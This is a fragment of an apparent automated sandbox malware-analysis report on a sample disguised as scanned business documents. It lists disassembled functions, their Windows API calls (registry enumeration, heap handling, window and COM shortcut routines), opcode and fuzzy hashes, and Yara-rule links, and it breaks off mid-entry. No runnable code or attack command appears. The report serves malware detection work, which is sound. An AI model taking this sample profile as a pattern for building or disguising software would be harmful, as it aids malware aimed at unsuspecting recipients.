                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: 6b73ec3e4b42f34b0213429384f48c11a8b280ee7073421843412b53b0205135
                                                      • Instruction ID: 2013c0dc55e2f9285d9521f14cfc82f960029680267ff9ff9583e73278c9f694
                                                      • Opcode Fuzzy Hash: 6b73ec3e4b42f34b0213429384f48c11a8b280ee7073421843412b53b0205135
                                                      • Instruction Fuzzy Hash: 6611B2B2150219BEEF129F64CC85EE77F9DEF0D798F014120FA18A6190C7729C61DBA4
                                                      Function 002BD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002BD7A3: _free.LIBCMT ref: 002BD7CC
                                                      • _free.LIBCMT ref: 002BD82D
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002BD838
                                                      • _free.LIBCMT ref: 002BD843
                                                      • _free.LIBCMT ref: 002BD897
                                                      • _free.LIBCMT ref: 002BD8A2
                                                      • _free.LIBCMT ref: 002BD8AD
                                                      • _free.LIBCMT ref: 002BD8B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                      • Instruction ID: c3f3479b8056449e6cd38e08fe0bd7ece970f76970168adaf15c2db6cb9b24b6
                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                      • Instruction Fuzzy Hash: E4110D71561F04FBD521BFB0CC47FCBBBDC6F04780F404C25B2ADA6492EA65B5255A50
                                                      Function 002EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002EDA74
                                                      • LoadStringW.USER32(00000000), ref: 002EDA7B
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002EDA91
                                                      • LoadStringW.USER32(00000000), ref: 002EDA98
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002EDADC
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 002EDAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      • Opcode ID: 64c0461214163b3824e70ecd180b0eaac2a083394734f1f02c11480f0f959342
                                                      • Instruction ID: 1d23cdb1d2125850ee15ae9f8e0b8d6fae9a5543db4c11b0eb71be4c416ca430
                                                      • Opcode Fuzzy Hash: 64c0461214163b3824e70ecd180b0eaac2a083394734f1f02c11480f0f959342
                                                      • Instruction Fuzzy Hash: 8A0186F65902087FE712DBA49D89EE7336CE70C301F4054A6F746E6041E6749E844F74
                                                      Function 002F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(00D2D3E8,00D2D3E8), ref: 002F097B
                                                      • EnterCriticalSection.KERNEL32(00D2D3C8,00000000), ref: 002F098D
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 002F099B
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 002F09A9
                                                      • CloseHandle.KERNEL32(00000000), ref: 002F09B8
                                                      • InterlockedExchange.KERNEL32(00D2D3E8,000001F6), ref: 002F09C8
                                                      • LeaveCriticalSection.KERNEL32(00D2D3C8), ref: 002F09CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: 54a7156a3423b852e63191d8702d7237ff788c8b8a589d66259b427986b31727
                                                      • Instruction ID: 375047b79cb7f078f131039387d06c60ef6ec5747e0b680d8de0a87c79d0117e
                                                      • Opcode Fuzzy Hash: 54a7156a3423b852e63191d8702d7237ff788c8b8a589d66259b427986b31727
                                                      • Instruction Fuzzy Hash: CBF03131492612FBDB525F94EE8CBE6BB39FF09742F406425F202508A1D774A476CF90
                                                      Function 002B01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __allrem.LIBCMT ref: 002B00BA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B00D6
                                                      • __allrem.LIBCMT ref: 002B00ED
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B010B
                                                      • __allrem.LIBCMT ref: 002B0122
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002B0140
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                      • Instruction ID: bfe3900a58a73756df6180d1e7cbd285a7d6b46ab067da21e92a2a04a92e54ed
                                                      • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                      • Instruction Fuzzy Hash: B5811D71A207069FE725AF68CC81BAB73E89F423A4F24453DF415D76D1EBB4D9208B50
                                                      Function 002B61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002A82D9,002A82D9,?,?,?,002B644F,00000001,00000001,8BE85006), ref: 002B6258
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,002B644F,00000001,00000001,8BE85006,?,?,?), ref: 002B62DE
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 002B63D8
                                                      • __freea.LIBCMT ref: 002B63E5
                                                        • Part of subcall function 002B3820: RtlAllocateHeap.NTDLL(00000000,?,00351444,?,0029FDF5,?,?,0028A976,00000010,00351440,002813FC,?,002813C6,?,00281129), ref: 002B3852
                                                      • __freea.LIBCMT ref: 002B63EE
                                                      • __freea.LIBCMT ref: 002B6413
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 43d2c8f0909bc2fea7355d60be483dffc446192d0f0d5cf2b03aaac85288813e
                                                      • Instruction ID: ed289e41bb62eca4f8dbaa1f0065dc1f54bfa051a433442d871d8ac016c1fb20
                                                      • Opcode Fuzzy Hash: 43d2c8f0909bc2fea7355d60be483dffc446192d0f0d5cf2b03aaac85288813e
                                                      • Instruction Fuzzy Hash: 5851D372620217ABEB258FA4DC89EEF77A9EB44B90F144669FC05D6140DB38DC64CA60
                                                      Function 0030BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 0030C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030B6AE,?,?), ref: 0030C9B5
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030C9F1
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA68
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030BCCA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030BD25
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030BD6A
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0030BD99
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0030BDF3
                                                      • RegCloseKey.ADVAPI32(?), ref: 0030BDFF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      • Opcode ID: 100c379eb7f27eaf7d11b176807644ece903ba590f3e9424fa98248b6749263a
                                                      • Instruction ID: e4adcbddc24da45a69de7caa12b7e1a153024c69ca6f3d497daa3ea92d67e694
                                                      • Opcode Fuzzy Hash: 100c379eb7f27eaf7d11b176807644ece903ba590f3e9424fa98248b6749263a
                                                      • Instruction Fuzzy Hash: FE81BE30219241AFD715EF24C891E2AFBE9FF84308F14855DF4598B2A2DB31ED45CB92
                                                      Function 002DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 002DF7B9
                                                      • SysAllocString.OLEAUT32(00000001), ref: 002DF860
                                                      • VariantCopy.OLEAUT32(002DFA64,00000000), ref: 002DF889
                                                      • VariantClear.OLEAUT32(002DFA64), ref: 002DF8AD
                                                      • VariantCopy.OLEAUT32(002DFA64,00000000), ref: 002DF8B1
                                                      • VariantClear.OLEAUT32(?), ref: 002DF8BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      • Opcode ID: 407f9c0c724091e0a094cf6f8173802fbaea45dbbe63d1f67bac3da067701a93
                                                      • Instruction ID: be8f5fdd4ccafb5f48c55f64f12fd00d18875c25b6c644a2014c94e2ce5ee43f
                                                      • Opcode Fuzzy Hash: 407f9c0c724091e0a094cf6f8173802fbaea45dbbe63d1f67bac3da067701a93
                                                      • Instruction Fuzzy Hash: 74510535974310AACF90AF65D9A5769B3A8EF45310F209467EC07DF391DB708C60CB9A
                                                      Function 002F910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00287620: _wcslen.LIBCMT ref: 00287625
                                                        • Part of subcall function 00286B57: _wcslen.LIBCMT ref: 00286B6A
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 002F94E5
                                                      • _wcslen.LIBCMT ref: 002F9506
                                                      • _wcslen.LIBCMT ref: 002F952D
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 002F9585
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName$OpenSave
                                                      • String ID: X
                                                      • API String ID: 83654149-3081909835
                                                      • Opcode ID: c409bd4c1f9bc399d8342638f5b50946ef0499c68ef94cd0c23fdd8a7cead85a
                                                      • Instruction ID: e2bd9dda648dec8a622738708230e0a53687c3e2a4d99ea4bc3e43bed2fd09fd
                                                      • Opcode Fuzzy Hash: c409bd4c1f9bc399d8342638f5b50946ef0499c68ef94cd0c23fdd8a7cead85a
                                                      • Instruction Fuzzy Hash: B2E1E1355283018FD724EF24C881B6AB7E4BF85350F04896DF9899B2A2DB30DD55CF92
                                                      Function 0029920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • BeginPaint.USER32(?,?,?), ref: 00299241
                                                      • GetWindowRect.USER32(?,?), ref: 002992A5
                                                      • ScreenToClient.USER32(?,?), ref: 002992C2
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002992D3
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00299321
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002D71EA
                                                        • Part of subcall function 00299339: BeginPath.GDI32(00000000), ref: 00299357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 3050599898-0
                                                      • Opcode ID: fc1b57b87550fe8e4f96ab5e54240814736d747e43d81d91b3e167459cb4731c
                                                      • Instruction ID: cc2c3a05a8b83011d2a0576a9313d22cd366ff6047f36d70b823d0ee0fe4bae5
                                                      • Opcode Fuzzy Hash: fc1b57b87550fe8e4f96ab5e54240814736d747e43d81d91b3e167459cb4731c
                                                      • Instruction Fuzzy Hash: 3E41B271124301AFDB12DF28CC84FAA7BA8EB4A331F04026DF955872B1D7709C95DBA1
                                                      Function 002F07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 002F080C
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 002F0847
                                                      • EnterCriticalSection.KERNEL32(?), ref: 002F0863
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 002F08DC
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 002F08F3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 002F0921
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: 20393da4a80f646a25ff6082ca07df0c2b6ff4ba99981af3ca34b71e6eee0e60
                                                      • Instruction ID: 8ca095f39503aa3758ec59a159da489d2eddfa7ef7f0cd474942e554388ecac5
                                                      • Opcode Fuzzy Hash: 20393da4a80f646a25ff6082ca07df0c2b6ff4ba99981af3ca34b71e6eee0e60
                                                      • Instruction Fuzzy Hash: 90418A31A10209EBDF15AF54DC85AAAB7B8FF08700F1480B5ED009A297DB30DE65DBA0
                                                      Function 003181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,002DF3AB,00000000,?,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 0031824C
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00318272
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003182D1
                                                      • ShowWindow.USER32(00000000,00000004), ref: 003182E5
                                                      • EnableWindow.USER32(00000000,00000001), ref: 0031830B
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0031832F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 84148b7719aa9982a19b6951efab152b31f608029d708fe012bbb9acb7947d37
                                                      • Instruction ID: 3a0ece3b45bb9d17828d683ee94c14d125e12024aec1cad3796e0d87c0b4995d
                                                      • Opcode Fuzzy Hash: 84148b7719aa9982a19b6951efab152b31f608029d708fe012bbb9acb7947d37
                                                      • Instruction Fuzzy Hash: 6541D438601640AFDB2BCF14C899BE47BF4BB0E715F195568E5184F2B2CB71AC82CB44
                                                      Function 002E4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 002E4C95
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002E4CB2
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002E4CEA
                                                      • _wcslen.LIBCMT ref: 002E4D08
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002E4D10
                                                      • _wcsstr.LIBVCRUNTIME ref: 002E4D1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: 48ff2eb05f9479c9b72a1c7d2fed405954f06399252bdaaa436fb79e9a7c551f
                                                      • Instruction ID: ba182f6bac8eb6b80556a12413522b32cf7c67fd19d5cef018e7af6acbfe3878
                                                      • Opcode Fuzzy Hash: 48ff2eb05f9479c9b72a1c7d2fed405954f06399252bdaaa436fb79e9a7c551f
                                                      • Instruction Fuzzy Hash: 54210B31264241BBEB156F3ADC49E7B7B9CDF49750F54803AF805CB192DE61DC6096A0
                                                      Function 002F581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                      • _wcslen.LIBCMT ref: 002F587B
                                                      • CoInitialize.OLE32(00000000), ref: 002F5995
                                                      • CoCreateInstance.OLE32(0031FCF8,00000000,00000001,0031FB68,?), ref: 002F59AE
                                                      • CoUninitialize.OLE32 ref: 002F59CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: d865a7187a5fadca1e5ffd92330f3c5dc20b17c30b8d32789dcb3eda434d1eab
                                                      • Instruction ID: 22f4b0da1cea4131be359603d4226d6da49f2e1c40cdefb833e1e862a44653c2
                                                      • Opcode Fuzzy Hash: d865a7187a5fadca1e5ffd92330f3c5dc20b17c30b8d32789dcb3eda434d1eab
                                                      • Instruction Fuzzy Hash: 45D174746146159FC704EF24C48092ABBE1FF89754F14886DFA8A9B361CB31EC55CF92
                                                      Function 002E175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
